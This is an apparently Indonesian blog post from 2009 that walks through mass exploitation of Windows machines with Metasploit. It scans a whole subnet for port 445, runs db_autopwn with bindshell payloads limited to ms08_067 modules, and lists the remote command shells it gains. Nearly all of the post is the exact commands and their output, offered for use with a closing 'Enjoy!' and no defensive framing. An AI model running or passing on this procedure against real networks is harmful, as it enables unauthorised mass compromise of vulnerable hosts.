Ekploitasi masal dengan metasploit

Posted on 14. Dec, 2009 by Kang Nadoel in Uncategorized

Dalam rangka mengurangi kebodohan dalam hacking, kali ini kang nadoel yang merasa urang subang dan juga urang sunda yang sekaligus penggemarnya doel sumbang, ingin berbagi tentang exploitasi kelemahan windows menggunakan metasploit.

msf > load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3

Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:

msf > db_create [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db

To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:

msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24

Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string “ms08_067″ in their name:

msf > db_autopwn -e -p -b -m ms08_067

Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.

msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

Enjoy!

Tulisan terkait lainnya :

Tags: doel sumbang, kang nadoel, metasploit, shell, urang subang, urang sunda, windows